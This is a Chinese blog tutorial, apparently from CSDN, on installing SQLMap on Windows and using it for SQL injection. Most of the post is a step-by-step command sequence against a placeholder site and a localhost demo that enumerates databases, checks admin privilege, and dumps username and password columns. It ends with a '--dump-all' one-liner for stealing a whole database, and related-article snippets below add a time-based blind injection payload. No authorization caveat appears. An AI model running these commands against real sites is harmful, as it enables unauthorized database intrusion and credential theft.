windows SQLMAP注入

最新推荐文章于 2024-06-17 13:37:15 发布
最新推荐文章于 2024-06-17 13:37:15 发布
阅读量1.6k 收藏 7
点赞数 2
分类专栏: 安全测试

0x 00 前言

正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来…

PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLMap才是绝对的注入神器

0x 01 注入原理

开始分割线

时间原因,这段内容就先不写了

就是因为太重要了所以要整理好在写上哈

虽然事实上是我现在还没搞太明白我会乱说 :)

结束分割线

0x 02 安装SQLMap

1. 安装python

官网https://www.python.org/ 选择最新版本下载安装即可

因为SQLMap使用Python写的 ,所以没有Python的环境SQLMap无法运行

2. 安装SQLMap

官网 http://sqlmap.org/ 选择最近版本安装即可

3. 设置环境变量

为了使用便利,将SQLMAP的安装目录添加到系统环境变量中

之后在CMD中就可以直接使用SQLMap了

不设置环境变量的话,要把CMD的当前目录切换到SQLMap安装目录才可以使用

0x 03 SQLMap常用命令介绍

1. sqlmap.py -u “http://www.XXX.com/index.asp?id=1

判断id参数是否存在注入:结果中包含 “id” is Vulnerable 字段表示存在注入

存在注入,下面的步骤才可以执行成功~

2. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” --dbs

列举能列出的所有数据库名

3. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” --current-db

列出当前使用的数据库名,假设列出“sqltest”数据库

4. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” --is-dba

判断该注入点是否有管理员权限:返回true 表示是管理员

5. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” -D “sqltest” --tables

获取sqltest中的所有表,假设有"admin"表

6. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” -D “sqltest” -T “admin” --columns

列举表admin的字段(列名),假设存在"username","password"字段

7. sqlmap.py -u “http://www.XXX.com/index.asp?id=1” -D “sqltest” -T “admin” -C “username,password” --dump

下载字段username,password的值,若询问是否破解md5加密,选择no即可

至此,对一个简单的注入点(GET方式),现在就已经得到了我们想要的数据

想看工具的注入过程 使用-v参数

-level 会提高注入等级(默认0 只会判断get,post参数是否有注入点)

若注入点是POST方式,或是注入点才Cookie,User-Agent中,可以利用-Date 参数 -Cookie参数指定

当然用buip Suite架个代理,截取数据包,直接 -r 参数引入数据包也可以完成上述的注入情况的~

0x 04 注入Demo

本次演示使用Apache+Php +Mysql 环境,其他环境的话

使用SQLMap输入还是相同的命令,这点SQLMap做的好方便

在这里插入图片描述

sqlmap.py -u “http://127.0.0.1/sqlinject.php?id=1” --dbs 列所有数据库名
在这里插入图片描述

sqlmap.py -u “http://127.0.0.1/sqlinject.php?id=1” --current-db 列出当前数据库

在这里插入图片描述

sqlmap.py -u “http://127.0.0.1/sqlinject.php?id=1” --is-dba   判断注入点是否有管理员权限

在这里插入图片描述

sqlmap.py -u “http://127.0.0.1/sqlinject.php?id=1” -D “test” --tables  猜表名

在这里插入图片描述

sqlmap.py -u “http://127.0.0.1/sqlinject.php?id=1” -D “test” -T “test” --columns  猜字段名
在这里插入图片描述

sqlmap.py -u “http://127.0.0.1/sqlinject.php?id=1” -D “test” -T “test” -C “id,name” --dump 猜id和name的值
在这里插入图片描述

网络上流传的脱裤 用的可就是下面的一句话

sqlmap.py -u “http://127.0.0.1/sqlinject.php?id=1” -D “test” --dump-all

突然发现 强大的东西往往仅仅是一句话 ! !

这条命令会直接把test数据库中所有的表全部下载到安装目录output文件夹中

清酒晚粥
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLMAP- 自动注入
含笑
05-20 5145
SQLmap是一款用来检测与利用SQL注入漏洞的基于python2.7开发的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。 基于布尔的盲注检测 基于时间的盲注检测 ‘and (select * from (select(sleep(20)))a)–+ 基于错误的检测 基于UNION联
sqlmap注入教程 常用指令
qq_58000413的博客
06-29 1876
sqlmap一些指令
sql注入sqlmap
qq_62046696的博客
07-01 872
通过id的报错可以判断是字符型注入,order by 得出字段数是3简单来说,就是利用参数二的特殊字符串,去匹配参数一中的东西。 正常情况下 参数二的特殊字符串就是一段符合xpath语法规则的字符串。当参数二不符合xpath语法规矩,这个函数就会报错,显示出参数二的内容。 报错注入就是利用这个原理来进行的。 看例子,这里的参数一是随便写的1,参数二是concat(0x7e,(select version()),0x7e) concat函数是用来连接字符串的,就是将它的所有参数连接起来。 0x7e代表的
sql注入sqlmap(渡栗的学习笔记)
最新发布
2301_79998006的博客
06-17 1077
sqlmap的使用。Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。
超详细SQLMap使用攻略及技巧分享
白昼小丑的博客
03-28 915
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:http://sqlmap.org/, 下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master 演示视
渗透测试SQL注入——Sqlilabs关卡详解
人若有志,就不会在半坡停止。
10-18 961
SQL注入sql注入点:url表单、搜索栏、动态网页(有参数提交的地方)、伪静态、请求头http的头部字段(user-agent、cookie、refer、x-forward-for)安全策略:先上waf 分类、 登录注入、 cms注入、article.php?id=、 数值型 、字符串型 Select * from tb where id=’ $id’ 、有回显 、无回显、 按注入的程度和顺序、 一阶注入 、二阶注入、 其他业务场景、延时盲注、布尔盲注。
Sqli-labs全通关教程(手工注入+工具使用sqlmap
热门推荐
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
SQLMAP Windows
02-23
Windows环境下使用SQLMAP,首先要了解SQL注入的基本概念。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意SQL代码,从而获取、修改或删除数据库中的敏感信息。SQLMAP通过自动化这一过程,大大...
sqlmap注入
10-26
以下是对SQLMap注入相关知识点的详细介绍: **1. SQL注入简介** SQL注入是黑客攻击的一种常见方式,通过在Web表单输入框或其他用户可控的数据点注入恶意SQL代码,来篡改或获取数据库中的敏感信息。SQLMap利用这种...
SQLMAP注入使用
05-13
sqlmap可以多平台运行,windows,linux下都可以进行access,mysql,mssql等数据库的注入,更重要的是sqlmap是一款开源的工具。 SQLMAP注入命令详解: 1. python SQLMAP.py -u "xxxxxxx.com"【查询链接是否存在...
SqlMap注入神器免Python安装版
05-20
SqlMap的免Python版本特别为那些无法或不想安装Python环境的用户设计,尤其适用于Windows操作系统。 SqlMap的工作原理基于对HTTP请求的操纵,通过改变参数值来探测服务器后端数据库中的潜在漏洞。它能自动识别网站...
sqlmapwindows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
SQL注入(使用sqli-labs案例以及sqlmap自动化注入工具)
04-29 4906
SQL注入: sqli-labs: 一个实验平台,里面有完整的SQL注入课程,需要phpstudy环境,因此先安装phpstudy环境 phpstudy: https://www.xp.cn/ 安装后发现数据库和我本机的数据库出现冲突了,只能使用 sc delete mysql 删掉我本机的mysql8服务,如果需要使用原来的mysql,管理员命令下输入 mysqld --install 删除之后成功启动 启动成功后,去下载sqli-labs: https://github.com/Audi-1/
利用sqlmap进行post注入(实操)
peanut5036的博客
12-23 3824
SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数
Sqlmap使用安装和命令详细教程
2301_77147676的博客
03-22 1369
-auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM) --auth-cred=ACRED HTTP身份验证凭据(用户名:密码) --auth-cert=ACERT HTTP认证证书(key_file,cert_file) --proxy=PROXY 使用HTTP代理连接到目标URL --proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码) --ignore-proxy 忽略系统默认的HTTP代理。
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap常用参数和原理
weixin_64622881的博客
04-18 1507
其原理是通过构造恶意的SQL查询语句,利用应用程序的漏洞来执行SQL注入攻击。具体一点就是,SQLmap首先分析目标网站的结构和参数,尝试检测是否存在SQL注入漏洞。如果存在漏洞,它将尝试利用不同的技术(如布尔盲注、时间盲注、联合查询注入等)来获取数据或者直接对数据库进行修改。
sqlmap之sql注入原理利用
m0_55313512的博客
02-26 2377
SqlMap
sqlmap命令详解
Pitbull2014的博客
12-20 1132
cookie注入sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
windows安装sqlmap
09-10
要在Windows上安装sqlmap,可以按照以下步骤进行操作: 1. 首先,在你的浏览器中打开sqlmap的官方网站,并下载最新版本的sqlmap。...这样,你就成功地在Windows上安装了sqlmap,并可以开始使用它来进行SQL注入测试了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值